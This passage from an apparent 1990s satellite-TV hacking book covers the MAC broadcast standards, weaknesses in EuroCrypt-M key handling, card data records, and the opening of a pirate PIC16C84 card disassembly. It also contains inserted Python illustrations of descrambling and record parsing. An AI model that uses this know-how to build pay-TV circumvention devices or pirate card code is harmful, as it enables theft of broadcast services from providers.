information. Unfortunately this was not enough. 


Some hackers noticed that there were barcodes on the back of the 
decoders. It may have been that the barcodes held the identification data of 
each decoder. The main problem was that the identity data was held in a 
secured microcontroller. 


Unlike the 525 B-MAC version, which used the 68705, the 625 B-MAC 
version used the 68HC11. According to some sources Scientific Atlanta 
considered the European hacking environment to be potentially more hostile 
than the USA. Of course the alternative explanation was that they had just 
marketed a more advanced version in Europe. 


The main European hacking work on B-MAC was carried out prior to the 
launch of ASTRA. The market was much smaller. The number of dish 
owners in Europe was quantified in thousands. There were some descram- 
blers being developed for FilmNet, Premiere the English movie channel, 
and BBC. The scrambling systems used at that time were analogue and 
descramblers were easy to build. 


When ASTRA was launched, the ease of hacking FilmNet created the biggest 
market for satellite pirate descramblers. At the peak of the analogue 
market, at least 1.5 million pirate FilmNet descramblers were in use in 
Europe. 


What must be worrying Scientific Atlanta is that the European market has 
changed and there are some hackers who are examining the feasibility of 
marketing a B-MAC video only decoder. With the pirate devices giving audio 
and video costing in the region of £900, a low cost video only decoder for 
the racing channel would probably be an economically viable pirate device. 
The D-MAC Standard 


D-MAC is effectively the English MAC standard, primarily because it was 
used on the UK's first and last high power DBS service. It is now basically 
a defunct standard, which is a shame, as it was a superior system to 
PAL 625. It can carry eight 15 kHz audio channels or their equivalent in 
data services. 


D-MAC Specifications 

Number Of Lines Per Frame:       625 
Lines With Data:                 All 
Video Lines:                     24-310, 336-622 
Luminance:                       Y in each line 
Chrominance:                     U in odd lines, V in even lines 
Interlace:                       2:1 
Aspect Ratio:                    4:3 
Luminance Compression Ratio:     3:2 
Chrominance Compression Ratio:   3:1 
Sampling Clock Frequency:        20.25 MHz 
Instantaneous Bit Rate:          20.25 Mbit/s 
Samples Per Line:                1296 
Luminance Samples:               697 
Chrominance Samples:             349 
Bits Per Data Packet:            206 (1 run-in bit + 6 bit H synch word 
                                 + 2 x 99 data bits + 1 spare bit) 

Line 624: data and analogue reference levels. 

Line 625: 648 data bits, made up of 
    6 bits    - horizontal synch word 
    32 bits   - clock run-in 
    64 bits   - vertical synch word 
    546 bits  - service information 


Data Structure And Format 


The data packets in the D-MAC signal contain the audio and the synch 
words. The synch word is 6 bits long. It is transmitted as 001011 and 
110100 in alternate lines. The vertical synch word is 64 bits long and is 
transmitted at the start of line 625. 


The video scrambling system used on the D-MAC signal is double cut and 
rotate; there is no difference between the scrambling used on D2-MAC and 
that used on D-MAC. The chrominance and luminance packets are cut and 
rotated separately: the chrominance is cut at one of 256 points and the 
luminance at one of 256 points. 


When the video is unscrambled there is a rough video compatibility 
between D-MAC and D2-MAC. This is why some users of unconverted BSB 
D-MAC / EuroCypher receivers can lock up other MAC transmissions but fail 
to decode their audio. 


The data on the D-MAC system in each frame amounts to 164 packets of 
751 bits each. Each packet breaks down into a 23 bit header, an 8 bit 
packet type and 720 bits of audio data or, in some cases, other data types. 


The header breaks down as follows: Address, 10 bits; Continuity Index, 
2 bits; Protection Suffix, 11 bits. 
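The packet layout above, and the same one on D2-MAC (99 data bits per packet slot per line, two slots per line on D-MAC and one on D2-MAC, with the 6 bit synch word alternating 001011 and 110100), as an added Python example; this is not the book's code. It takes only the figures given in the text: a 751 bit packet is a 23 bit header (10 bit address, 2 bit continuity index, 11 bit protection suffix), an 8 bit packet type and 720 bits of data, and because 751 is not a multiple of 99 the packets straddle lines. Line 625, the run-in and spare bits, the duobinary coding and verification of the protection suffix are out of scope; the suffix is extracted but not checked. The zero padding at the end of the last line is a constructed convenience, not something the page specifies.

```python
"""D-MAC / D2-MAC data channel: synch check and 751-bit packet reassembly.

Added illustration, not the book's code.  Field widths are the ones
given in the text; bits are handled as '0'/'1' strings for clarity.
"""

SYNC_WORDS = ("001011", "110100")  # 6-bit line synch word, alternate lines
SYNC_BITS = 6
SLOT_BITS = 99                     # data bits per packet slot per line
PACKET_BITS = 751
ADDRESS_BITS, CI_BITS, SUFFIX_BITS, TYPE_BITS, DATA_BITS = 10, 2, 11, 8, 720
assert ADDRESS_BITS + CI_BITS + SUFFIX_BITS + TYPE_BITS + DATA_BITS == PACKET_BITS


def make_packet(address, continuity, suffix, packet_type, data):
    """Assemble one 751-bit packet as a bit string."""
    if not (0 <= address < 1024 and 0 <= continuity < 4
            and 0 <= suffix < 2048 and 0 <= packet_type < 256):
        raise ValueError("header field out of range")
    if len(data) != DATA_BITS or set(data) - {"0", "1"}:
        raise ValueError("data must be 720 bits")
    return f"{address:010b}{continuity:02b}{suffix:011b}{packet_type:08b}{data}"


def lay_out_lines(packets, slots_per_line):
    """Spread a packet stream over lines: synch word + slots*99 data bits.
    slots_per_line is 2 for D-MAC and 1 for D2-MAC.  The zero padding on
    the last line is constructed for this example."""
    stream = "".join(packets)
    per_line = slots_per_line * SLOT_BITS
    lines = []
    for i in range(0, len(stream), per_line):
        chunk = stream[i:i + per_line].ljust(per_line, "0")
        lines.append(SYNC_WORDS[len(lines) % 2] + chunk)
    return lines


def parse_lines(lines, slots_per_line):
    """Check synch alternation, strip the synch words, reassemble packets
    and decode their headers.  Trailing bits shorter than a packet are
    dropped.  The protection suffix is extracted, not verified."""
    per_line = slots_per_line * SLOT_BITS
    chunks = []
    for n, line in enumerate(lines):
        sync, data = line[:SYNC_BITS], line[SYNC_BITS:]
        if sync != SYNC_WORDS[n % 2]:
            raise ValueError(f"line {n + 1}: synch word {sync} out of sequence")
        if len(data) != per_line:
            raise ValueError(f"line {n + 1}: expected {per_line} data bits")
        chunks.append(data)
    bits = "".join(chunks)
    packets = []
    for i in range(0, len(bits) - PACKET_BITS + 1, PACKET_BITS):
        p = bits[i:i + PACKET_BITS]
        packets.append({
            "address": int(p[0:10], 2),
            "continuity": int(p[10:12], 2),
            "suffix": int(p[12:23], 2),
            "type": int(p[23:31], 2),
            "data": p[31:],
        })
    return packets


if __name__ == "__main__":
    # Constructed sample: two packets to address 5 with consecutive CI values.
    stream = [make_packet(5, 0, 0x3FF, 0xA0, "10" * 360),
              make_packet(5, 1, 0x001, 0xA0, "0" * 720)]
    for slots, name in ((2, "D-MAC"), (1, "D2-MAC")):
        lines = lay_out_lines(stream, slots)
        print(name, len(lines), "lines ->",
              [(p["address"], p["continuity"]) for p in parse_lines(lines, slots)])
```

The synch alternation check is what a decoder actually locks to; a line whose synch word is out of sequence is the first sign of a lost line, and the parser refuses to reassemble across it rather than silently shifting every later packet by 99 bits.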


The audio channels can be high quality or medium quality types. The 
parameters for a high quality channel are 15 kHz bandwidth and 32 kHz 
sampling frequency; for the medium type, 7 kHz bandwidth and 16 kHz 
sampling frequency. 


The audio channels have a choice of coding types, NICAM or linear. The 
NICAM coding is the same as that used terrestrially (see Chapter 2): 
essentially a digital companding system in which each 14 bit sample is 
compressed to 10 bits. The linear type of coding uses the 14 bit sample 
without compression. 


The D2-MAC Standard 


D2-MAC is effectively the European MAC standard, for all that is worth. 
The European Commission made it so at the behest of the MAC chip and 
decoder manufacturers. There was even the great quote from the then 
Commissioner Pandolfi about how he was taking advice from the main 
decoder manufacturers on the subject: not exactly unbiased information. 
After this fiasco it is difficult to take anything that the European 
Commission does in information technology seriously. 


However the whole idea of D2-MAC EuroCrypt-M as the European television 
standard collapsed as the market didn't bother taking any notice of these 
bureaucrats. And the bureaucrats did not understand that technology in the 
television market moves on what economics would term a long cycle. It can 
take ten years or more for a system to move into operation and replace an 
existing one. This is especially the case where the technology of the 
existing market is being replaced. These people wanted it to happen in the 
space of a few years. For the best example of this, observe how the 
American market is still split between the C-Band systems and the smaller 
and more advanced digital systems. 

Of course such realities did not stop the European Commission. They had, 
after all, their unbiased advice which gave them a glowing picture of the 
future of MAC. The theory among hackers is that they were all just social 
scientists. The reality is that in retrospect they were just bureaucrats with 
some good intentions trying to help and protect European jobs and 
industries. 

The D2-MAC standard would have become a footnote in the history of 
satellite television had it not been for one thing: piracy. The fact that 
the main movie channels in Europe using the D2-MAC standard have been 
hacked continually in recent years means that there is a larger market for 
pirate cards in Europe than for official cards. And each of those pirate 
cards requires a decoder or IRD. Thus piracy has created a thriving market 
in D2-MAC decoders. Even IRDs from the defunct BSB D-MAC venture are being 
converted to D2-MAC EuroCrypt. 

D2-MAC EuroCrypt can carry four 15 kHz audio channels. The primary 
advantage of the D2-MAC system over D-MAC is that it fits in the 
bandwidth of an ordinary cablenet channel. 


D2-MAC Specifications 

Number Of Lines Per Frame:       625 
Lines With Data:                 All 
Video Lines:                     24-310, 336-622 
Luminance:                       Y in each line 
Chrominance:                     U in odd lines, V in even lines 
Interlace:                       2:1 
Aspect Ratio:                    4:3 
Luminance Compression Ratio:     3:2 
Chrominance Compression Ratio:   3:1 
Sampling Clock Frequency:        20.25 MHz 
Instantaneous Bit Rate:          10.125 Mbit/s 
Samples Per Line:                1296 
Luminance Samples:               697 
Chrominance Samples:             349 
Bits Per Data Packet:            105 (6 bit H synch word + 99 data bits) 

Line 624: data and analogue reference levels. 

Line 625: 648 data bits, made up of 
    6 bits    - horizontal synch word 
    32 bits   - clock run-in 
    64 bits   - vertical synch word 
    546 bits  - service information 


Data Structure And Format 


The data packets in the D2-MAC signal contain the audio and the synch 
words. The synch word is 6 bits long. It is transmitted as 001011 and 
110100 in alternate lines. The vertical synch word is 64 bits long and is 
transmitted at the start of line 625. 


The video scrambling system used on the D2-MAC signal is double cut and 
rotate. This is a system whereby the chrominance and the luminance 
packets are cut and rotated separately. The chrominance is cut at one of 
256 points and the luminance is cut at one of 256 points. This type of 
scrambling is also employed on the D-MAC signal. 


The EuroCrypt-M system was the recommended standard for D2-MAC and is the 
most widely used EuroCrypt variant. Other variants such as EuroCrypt-S and 
EuroCrypt-S2 are also used. 


The main area of difference between the variants is the handling of the 
control word decryption. The EuroCrypt-M variant uses DES in ECB mode with 
the initial and inverse initial permutations removed, and encrypts the over 
the air data to generate the control word. The S variants use ECB mode DES 
with the initial and inverse initial permutations included, and decrypt 
the over the air data to generate the control word. 


The Eurocrypt M variant uses an 8 bit parallel interface between the Access 
Control Module and the D2-MAC decoder. It also allows the use of some 
sophisticated functions. 


The Eurocrypt S variant uses a 9600 Baud serial interface between the 
Access Control Module and the D2-MAC decoder circuitry. 


Most of the decoders on the market are capable of handling either of the 
variants. The demise of the BSB D-MAC venture left the market with a lot of 
very cheap IRDs that could easily be converted to D2-MAC EuroCrypt. As a 
result, there are many unofficial D2-MAC decoders on the market. This fact 
combined with the massive piracy on D2-MAC channels has perhaps given 
the D2-MAC EuroCrypt system a new lease of life. 


The EuroCrypt-M System 


EuroCrypt-M is one of the scrambling system overlays used on the D2-MAC 
standard. It is one of the most widely published systems. Most of the 
information in this section was gleaned from the official France Telecom 
specification, so the main part of the information necessary to hack this 
scrambling system was freely available. Of course the fact that they used 
a commonly available algorithm as their secret algorithm made things a lot 
easier. 


The sequence generator used for descrambling the video and audio data is 
a pseudo random binary sequence generator (PRBSG). The PRBSG is reset with 
a new seed, the control word, every 256 frames, as the frame counter is 
eight bits wide; at 25 frames per second that is every 10.24 seconds. 


The system is based on the detachable secure processor philosophy. The 
smart card contains the critical information. The decoder is essentially a 
dumb terminal. 


The basic key structure is hierarchical. In many respects it is similar to 
the VideoCipher II system, including the fact that the encryption is based 
on DES. The final key is a control word that is used to seed the PRBSG. 


The decoder itself is essentially dumb. It contains the video and audio 
descrambling circuitry, but this requires the control word data from the 
card. Once the decoder has the control words flowing to it, it will 
continue to descramble the video and audio. This makes it possible to 
attack the system with the McCormac Hack, distributing the control words 
over the internet if necessary, since a control word only changes every 
10.24 seconds. 
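The double cut and rotate scrambling described under the D-MAC and D2-MAC standards, driven by a control word seeded PRBS that is reseeded every 256 frames, as an added Python example; this is not the book's code and the generator is not the real EuroCrypt PRBSG. What is taken from the text: chroma and luma packets are cut at one of 256 points each and rotated separately, the PRBS is reseeded with a new control word every 256 frames (the eight bit frame counter), and the decoder needs only the control word stream, not the card. Assumptions: a 32 bit Galois LFSR with an arbitrary tap mask stands in for the real PRBS, each line consumes two PRBS bytes (chroma cut, then luma cut), and the cut index is `len(packet) * cut // 256`.

```python
"""Double cut-and-rotate scrambling driven by a control-word-seeded PRBS,
as on D-MAC / D2-MAC with EuroCrypt-M.

Added illustration; not the book's code and not the real EuroCrypt
generator (the LFSR below is a placeholder with an assumed tap mask).
"""

FRAMES_PER_CONTROL_WORD = 256  # 8-bit frame counter wraps: PRBS reseeded
CUT_POINTS = 256               # one of 256 cut points per packet


class Prbs:
    """Placeholder PRBS: 32-bit Galois LFSR, assumed tap mask."""
    TAPS = 0xA3000000

    def __init__(self, seed):
        self.state = (seed & 0xFFFFFFFF) or 1  # all-zero state would stick

    def bit(self):
        lsb = self.state & 1
        self.state >>= 1
        if lsb:
            self.state ^= self.TAPS
        return lsb

    def byte(self):
        value = 0
        for _ in range(8):
            value = (value << 1) | self.bit()
        return value


def cut_index(length, cut):
    """Map a cut point (0..255) onto a sample index in the packet."""
    return length * cut // CUT_POINTS


def cut_and_rotate(packet, cut):
    """Scramble: cut at one of 256 points and transmit the tail first."""
    k = cut_index(len(packet), cut)
    return packet[k:] + packet[:k]


def undo_cut_and_rotate(packet, cut):
    """Descramble: rotate back by the same amount."""
    k = cut_index(len(packet), cut)
    n = len(packet)
    return packet[n - k:] + packet[:n - k]


def _run(frames, control_words, rotate):
    """frames: list of frames, each a list of (chroma, luma) sample lists.
    control_words[i] seeds the PRBS for frames 256*i .. 256*i + 255."""
    out = []
    prbs = None
    for f, frame in enumerate(frames):
        if f % FRAMES_PER_CONTROL_WORD == 0:
            prbs = Prbs(control_words[f // FRAMES_PER_CONTROL_WORD])
        lines = []
        for chroma, luma in frame:
            chroma_cut, luma_cut = prbs.byte(), prbs.byte()
            lines.append((rotate(chroma, chroma_cut), rotate(luma, luma_cut)))
        out.append(lines)
    return out


def scramble(frames, control_words):
    return _run(frames, control_words, cut_and_rotate)


def descramble(frames, control_words):
    """Needs only the control words: the decoder is a dumb terminal."""
    return _run(frames, control_words, undo_cut_and_rotate)


if __name__ == "__main__":
    # Constructed sample: 257 tiny frames of 2 lines, so the second control
    # word is used exactly once (frame 256).
    frames = [[(list(range(256)), list(range(1000, 1512))) for _ in range(2)]
              for _ in range(257)]
    scrambled = scramble(frames, [0x1234, 0xBEEF])
    print("round trip ok:", descramble(scrambled, [0x1234, 0xBEEF]) == frames)
    print("frame 256 with wrong CW ok:",
          descramble(scrambled, [0x1234, 0x0001])[256] == frames[256])
```

Nothing in `descramble` touches the card: whoever can hand the decoder the control word every 10.24 seconds can descramble, which is the whole basis of the hack referred to above.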


The entitlement control and management messages flowing to the card 
have to be checksummed with a hash function. The hash function is 
resident in the card. The length of the hash is 64 bits. The hash function is a 
modified form of DES used in ECB mode. (see Chapter 6). 


This section is concerned with the weaknesses and hackability of the 
EuroCrypt system rather than its overall operation. Therefore I will 
concentrate only on what was relevant to hacking the system. 

The Card And Its Data Structure 

The smart card used on the EuroCrypt system is EPROM based and the CPU is 
6805 based. It was therefore easy to emulate using a similar 
microcontroller. However, the problem was that the 6805 type 
microcontrollers were just not secure enough or cheap enough for the 
pirate market. 
The code was popped from the D2-MAC EuroCrypt cards. There are of 
course other theories, such as a source inside France Telecom or 
elsewhere selling the code. These seem to have been the last desperate 
gasps of people in France Telecom and the channels trying to convince 
themselves that the pirates were not able to pop the cards. 


The card - decoder protocol conforms to the ISO 7816 specification 
concerning microprocessor based smart cards. The first version of the 
smart card was limited in operation. It contained 6K of ROM, 128 Bytes of 
RAM and 8K of EPROM. 


At this point in time both the EPROM types of card and the newer EEPROM 
types in operation on EuroCrypt-M channels have been compromised. 
When all of the excess architecture and data structures have been chipped 
away, there is really not that much to hacking the system. 


There are two types of entities on the card; the Service Entity and the Issuer 
Entity. 

The Service Entity 

This is the data relevant to the particular channel. It contains all of the 
information necessary to generate the control words from the over the air 


data. The information in the Service Entity breaks down into the following 
subsets. 


The Descriptor DESCR 


This section contains the programme provider identifier, or PPID: the 
20 bits that indicate the channel's identity. It also designates the types 
of access available, e.g. subscription, PPV, IPPV, and includes a service 
lock which allows the Service Entity to be locked out. 


The Keys 


There are two types of keys, Management Keys and Operation Keys. The 
management keys are concerned with decrypting the entitlement control 
messages and other management data. The operation keys are used to 
compute the control words and are therefore the most critical. 


The Label 


This is merely a name for the channel, e.g. FilmNet, and is not actually used 
by the card for any purpose. The length of the label is 10 bytes. 


The Programme Provider User Address 


The PPUA is a four byte address that identifies the user in the channel's 
access control system. The first three bytes indicate the user's Shared 
Address (SA) and the other byte indicates the user's position in the Shared 
Address block. This byte is designated the CUSTWP. Essentially this allows 
the users to be accessed and controlled in blocks of 256. 


The Geographical Code Address 


The GCA indicates the area that the user is in. Generally the GCA is used 
for geographical area blackout. This is also known as the Group Customer 
address. It is 32 bits in length and represents an eight digit hexadecimal 
coded number. The first three bytes are the Geographical Code, (GC). 
Typically these bytes are allocated from the six most significant bits of the 
customer's international phone number. The other byte is the subject code, 
(SC). 


The Entitlements 


Basically this is what the card is permitted to decrypt. The information in this 
section is the subscription, programmes or the amount of credits available. 
Of course before the card proceeds to generate a control word, it will check 
this section to see that it is permitted. 


FAC 


This is the general purpose data and is not critical data. Typically it would be 
the telephone number of the subscription centre (for modem link back) or 
other data. 


The Issuer Entity 


The issuer entity is essentially the soul of the card. It contains the 
information that is common to all of the Service Entities. The information 
stored in this entity is in four subsets. 


The Unique Address 


The UA is thirty six bits wide. This is the card identification code. It is used 
for card management by the issuer or the programme providers. 


The PIN Code 


This is just like the PIN code for bank cash card machines except in this 
application it relates to pay services and other functions. 


The Maturity Rating 


This is the period for which the present card is valid. When the card is reset, 
this rating is one of the first items of information returned from the card. 
The Preselection Area 


This section is used to store pre-booked programmes and other events. 
The programmes stored in this area will then be accessed without the user 
having to select them on the day. 


There are two extremely important routines that provide indications as to the 
characteristics of the critical data. Above all, one of them actually gives the 
number of keys in use on a particular service at the time the service is 
selected. This is an unusual attribute for a system. 


Card Reset 


When the card is inserted in the decoder it is reset. This starts the card 
decoder link but, of most interest, once the link is established the card 
returns a seven byte record. The bytes are: Component Number, Mask Number, 
Extension Byte 1, Extension Byte 2, Locks (Card Age), ME1 and ME2. The 
ME1 and ME2 bytes are the status words. 


Entity Selection 


In order to access a channel, the card has to select that particular Service 
Entity. When the entity has been successfully selected, it will return a 26 
byte record. 

(3 bytes) PPID 

(2 bytes) Memory Allocation for Entity 

(1 byte) Authorised Access Modes 

(2 bytes) Memory Allocation minus Memory Used 

(1 byte) Memory remaining for Entity 

(16 bytes) Indices of enabled keys 

Of these, the last is the most critical. It is an index of the active keys on the 
service. The format is a nybble represented by a hexadecimal number. 
Padding bytes of the value FF are used where the number of keys active is 
less than 16. 

Eight of these keys are management keys and the other eight are the 
operation keys. The management keys are designated 00 to 07 and the 
operation keys are designated 08 to 0F. 
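As an added illustration (not part of the original text or of any card software), a small parser for the two records described above: the seven byte record returned after card reset and the record returned on entity selection, with the key index list split into management and operation keys. The sample bytes are constructed, and the byte order of the multi-byte fields (big-endian) is an assumption.

```python
"""Parsers for the EuroCrypt-M reset record and entity-selection record.

Added example: field widths and the key-index convention follow the text
(indices 00-07 management, 08-0F operation, FF padding); byte order within
multi-byte fields is assumed big-endian.  Sample bytes are constructed.
"""
from dataclasses import dataclass
from typing import List

MGMT_KEY_MAX = 0x07     # management keys are designated 00-07
OP_KEY_MAX = 0x0F       # operation keys are designated 08-0F
KEY_PAD = 0xFF          # padding where fewer than 16 keys are active


@dataclass(frozen=True)
class ResetRecord:
    component: int
    mask: int
    ext1: int
    ext2: int
    locks: int          # "Locks (Card Age)"
    me1: int            # status words
    me2: int


@dataclass(frozen=True)
class EntityRecord:
    ppid: int
    mem_alloc: int
    access_modes: int
    mem_unused: int     # memory allocation minus memory used
    mem_remaining: int
    key_indices: List[int]

    @property
    def management_keys(self) -> List[int]:
        return [k for k in self.key_indices if k <= MGMT_KEY_MAX]

    @property
    def operation_keys(self) -> List[int]:
        return [k for k in self.key_indices if k > MGMT_KEY_MAX]


def parse_reset_record(data: bytes) -> ResetRecord:
    """Split the seven bytes returned after reset into named fields."""
    if len(data) != 7:
        raise ValueError(f"reset record must be 7 bytes, got {len(data)}")
    return ResetRecord(*data)


def parse_entity_record(data: bytes) -> EntityRecord:
    """Parse the record returned after a Service Entity is selected.

    The fields as listed total 25 bytes although the record is described
    as 26 bytes long; anything after the 16-byte key index list is ignored.
    """
    if len(data) < 25:
        raise ValueError(f"entity record too short: {len(data)} bytes")
    ppid = int.from_bytes(data[0:3], "big")      # 20-bit PPID in 3 bytes
    mem_alloc = int.from_bytes(data[3:5], "big")
    access_modes = data[5]
    mem_unused = int.from_bytes(data[6:8], "big")
    mem_remaining = data[8]
    key_indices: List[int] = []
    for pos, b in enumerate(data[9:25]):
        if b == KEY_PAD:
            continue                            # padding, not a key
        if b > OP_KEY_MAX:
            raise ValueError(f"bad key index 0x{b:02X} at position {pos}")
        key_indices.append(b)
    return EntityRecord(ppid, mem_alloc, access_modes, mem_unused,
                        mem_remaining, key_indices)


# Constructed sample records (not captured from a real card).
SAMPLE_RESET = bytes([0x01, 0x02, 0x00, 0x00, 0x05, 0x90, 0x00])
SAMPLE_ENTITY = (
    bytes([0x01, 0x23, 0x45])                 # PPID
    + bytes([0x02, 0x00])                     # memory allocated to entity
    + bytes([0x03])                           # authorised access modes
    + bytes([0x01, 0x80])                     # allocation minus used
    + bytes([0x40])                           # memory remaining
    + bytes([0x00, 0x01, 0x08, 0x09, 0x0A])   # two management, three operation
    + bytes([KEY_PAD] * 11)                   # FF padding to 16 entries
    + bytes([0x00])                           # 26th byte, ignored
)

if __name__ == "__main__":
    r = parse_reset_record(SAMPLE_RESET)
    e = parse_entity_record(SAMPLE_ENTITY)
    print(f"status words {r.me1:02X} {r.me2:02X}")
    print(f"PPID {e.ppid:05X}: {len(e.management_keys)} management, "
          f"{len(e.operation_keys)} operation keys active")
```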

The actual length of the keys appears to be 64 bits or eight bytes. This 
indicates that the crypto algorithm in use is DES or DES like. The recent 


hacks have proven that it was indeed the DES algorithm, albeit in a slightly 
modified format. 
This system is a one level system. The card is the sole security of the 
system. When it is hacked, the system is compromised. A new card has to 
be issued. 


There are four elements required for the hack. The hash function, the crypto 
algorithms, the management keys, and the operation keys. A minimal hack 
requires the hash function, the crypto algorithms and the operation keys. 


The fact that the hash checksumming function was not required in the initial 
pirate hacks was typical of the incompetence of the channels using the 
system. If they had started to send spoof packets it would have knocked out 
many of the pirate devices. This type of ECM was so simple that even News 
Datacom had used it effectively on issue 07. It is always the simple things 
that will bring a hack down, typically because the significance of certain 
routines is not understood at the time the hack is being implemented. 


The Hacking Of EuroCrypt-M 


EuroCrypt-M is a feature ridden hulk of a system. It contains many 
wonderful aspects and one fatal flaw. The flaw is that the decryption 
algorithm can be detached from the access control routines and made to 
work independently. 


When such a flaw exists in any system, the only thing that the programme 
provider can do is to repeatedly change the keys for the decryption 
algorithm. Of course this is of little use if the key update routines have been 
compromised as well. The hacker version will have a limited key update 
facility included. 


The pirate smart cards for Canal Plus and Cine Cinema have the key 
update facilities incorporated. This means that when the channel updates 
the key over the air, the pirate cards are similarly updated. However while 
the hackers and pirates have the management keys for the FilmNet, 
TV1000 and TV3 channels, the less than frequent key updates do not make 
it important for the pirate cards to include the management keys. Besides, 
every key update on these channels means more revenue for the hackers 
and pirates. 


Some of the current thinking is that FilmNet and TV1000 will resort to a key 
cycling over the Autumn. This basically means that they will switch between 
keys rather than relying on the limited downloading of new keys. The reason 
for this is that some of the PIC16C84 implementations do not have the full 
keyset. This is often due to the constraints of available memory. It would be 
a temporarily successful ECM. 
There is a rumour that the original PIC16C57 hack on the EuroCrypt system 
included the full array of keys, both management and operational. This code 
has been popped and its significance was overlooked. But as the 
knowledge of the hackers has grown, so too has the number searching for 
this lost file. You sort of get the impression of an Indiana Jones type search 
through backup disks and BBSes. Actually there have been messages 
posted about a twin PIC16C84 with two 24C65s which also has the 
management keys. 


Such a catastrophic failure of security is due mainly to a poorly structured 
system architecture that does not permit ECMs. In some respects, the 
system is a Frozen Architecture system. The EuroCrypt-M system is a 
classic example of this failure. 


The EuroCrypt-M system was flawed from the start. It was committee 
designed and certified. It was accepted by the paper shufflers of the 
European Commission as a good system and they made it the European 
standard. The fact that it was accepted as a standard meant that the system 
specification, less the secret algorithm, was openly available. You could 
actually buy a copy of the specification document for the system. 


France Telecom, to the eternal gratitude of the hackers throughout Europe 
chose the US Data Encryption Standard algorithm to be their secret 
algorithm. Of course France Telecom modified the implementation of the 
algorithm to make it run faster. The modifications are merely the removal of 
the Initial Permutation (IP) and the Inverse Initial Permutation (-IP). 


Other versions of EuroCrypt use the DES algorithm with the Initial 
Permutation and the Inverse Initial Permutation. However these too are 
hacked. 


Sometimes it may seem hard to understand why France Telecom, when 
developing EuroCrypt-M would choose the most examined and well 
understood algorithm in the world as their secret algorithm. It is not exactly 
secret but it is a good algorithm. At the time they selected it, around 1988, 
the hacker technology to pop smart cards did not exist. It was also very 
much a minority system with a very small installed decoder base. It was not 
until FilmNet switched to EuroCrypt-M that it became a lucrative target. With 
TV1000 also using it, there was no question about it. EuroCrypt-M was 
doomed. 


The main problem with DES as used in smart cards is that DES is a 
hardware based algorithm. A software implementation will naturally be less 
effective than a hardware implementation. There are some good DES ICs 
available but the design constraints of the application meant that these 
could not be used. 


In retrospect, they could have gone for something more innovative such as 
a hashing algorithm. This would make it easier to prove that there was an 
infringement of the software copyright in any pirate smart card case. Of 
course now it looks like the whole system was based on the false premise 
that the smart card was unhackable. 


Though the EuroCrypt-M system is a feature ridden hulk, some of these 
features are extremely good ones. The reason that the system does not 
lend itself readily to ECMs seems to be because the key handling protocols 
were considered so strong. 


In theory, the key handling protocols are the strongest aspect and had they 
been used as the designers intended, EuroCrypt would have been very 
difficult to hack successfully. However the clutter of all the other features, 
incapable technology and what can only be described as a lack of appreciation 
scuttled the strongest aspect. 


At the moment, the control word changes every 10.24 seconds or 256 
frames. The control word key, the one used to encrypt the control word, is 
only changed every few months at best. The key used to encrypt the new 
control word key is called the management key. This rarely changes. 


Theoretically, the control word key should be changed frequently, perhaps 
every few hours instead of every few months. The management keys 
should be changed approximately every month. The idea here is to make 
the whole key systems into a key cloud where nothing remains stable for 
long enough to become usable by a hacker. 


Much of the thinking here is that of the mid eighties. Indeed North American 
readers will notice the similarity of the theory with the VideoCipher II system. 
Indeed one implementation of the EuroCrypt system was as an Embedded 
Secure Microcontroller system. With such a system, this kind of thing would 
easily have been achievable in a couple of secured microcontrollers, 
as indeed it had been in the VideoCipher II system. It was as if all of the 
designers were using a variation of a single idea. It was a very conventional, 
almost textbook, implementation of key handling. Bureaucracies reward 
conformity not ingenuity. 


However the smart card offered a more secure medium, especially after the 
fiasco of the VideoCipher II system and all of its attendant hacks. The smart 
cards looked to be more secure at that point in time than any of the other 
technology and they were easier to distribute and eventually replace. 
However reality reared its ugly head and technology compromised the key 
handling protocol. The only cheaply available smart cards at the time were 
EPROM. The constraining factor here was that the keys could not be 
updated in EPROM as often as in EEPROM. 


The key system in EuroCrypt-M is a hierarchical one. The lowest key in the 
structure is the one that should be most frequently changed. The ones 
higher up are, according to the theory, changed less often. 


Failure in this kind of system is twofold. The first point of failure is when the 
key changes are not as regular as they should be thus providing a relatively 
static target for any hacker. The second point of failure is when the keys in 
the upper area of hierarchy are discovered. Since these keys are not 
changed regularly, the hacker or pirate has full access to all of the lower 
keys. Given the present situation, the only viable option left open to some of 
the channels is a completely new card issue and perhaps an algorithm other 
than DES. 


The Single PIC16C84 D2-MAC Card 


Originally the D2-MAC EuroCrypt hack relied on a PIC16C57. This was 
because it had more memory space than the PIC16C54. However the 
PIC16C57 was an EPROM/OTP type and the newer PIC16C84 was 
reprogrammable, being an EEPROM type. With the increasing availability, 
there was a move towards twin PIC16C84 cards for D2-MAC. 


With the advent of PicBuster, (see Chapter 3), the code from these 
PIC16C84s became more widely available. It was found that a lot of 
routines could be dispensed with in order to produce a bare metal 
implementation that would work. 


The documented disassembly given on the pages following, (courtesy of 
David Parkinson), is an excellent example of how the single PIC16C84 
D2-MAC cards work. 


The single PIC version was derived from studying the source code from a 
number of pirate PIC cards. Redundant routines such as those to handle 
switching between keys by the use of touchpads were removed. Also the 
recognised commands were trimmed down to the ones essential to proper 
operation. This version also optimised the DES so that it occupied less 
memory. It is regarded as the fundamental single PIC implementation and 
has been used by many hackers to understand how the pirate D2-MAC 
EuroCrypt cards work and to develop their own implementations whether in 
PIC16C84s or C or PASCAL. 
        title   "EUROCRYPT - Single PIC version - Nov 1995"
        subtitl "Definitions"
        list    c=132,P=16C84,R=DEC,F=inhx8M

; Originally from a dis-assembly of a commercial pirate card.
; This assembles with MPALC.EXE.
;
; Comments/labels by David Parkinson
;
; Version  Date
; 0.3      18 Nov 1995   DES code restructured to improve
;                        efficiency and speed. (>128bytes free)
;
; 0.2      11 Nov 1995   Incorporated fix from Ralph Metzler
;                        so the Nokia behaves.
;
; 0.1      Oct/Nov 1995  (Still working on it)
;
; Sort this out eventually. Currently TxByte and
; RxByte have hard coded instructions for Bit 6.
; ***Check those routines if you change this****
IFbit   equ     6
IFmask  equ     0BFh

; Some Macros to help readability

map     Macro   r1,b1,r2,b2     ; Map a bit in a byte to another
        btfsc   r1,b1
        bsf     r2,b2
        endm

; Used in the DES routines to do the key expansion. This maps
; specified bits in various bytes into bits 5-0 of a target byte
BuildEkey Macro r,r1,b1,r2,b2,r3,b3,r4,b4,r5,b5,r6,b6
        clrf    r
        map     r1,b1,r,5
        map     r2,b2,r,4
        map     r3,b3,r,3
        map     r4,b4,r,2
        map     r5,b5,r,1
        map     r6,b6,r,0
        endm

; Used in the DES routines to store four bits of an S-Box
; lookup (lo nibble) into the specified byte(s):bit(s)
StoreLo Macro   r1,b1,r2,b2,r3,b3,r4,b4
        movwf   Etemp
        map     Etemp,3,r1,b1
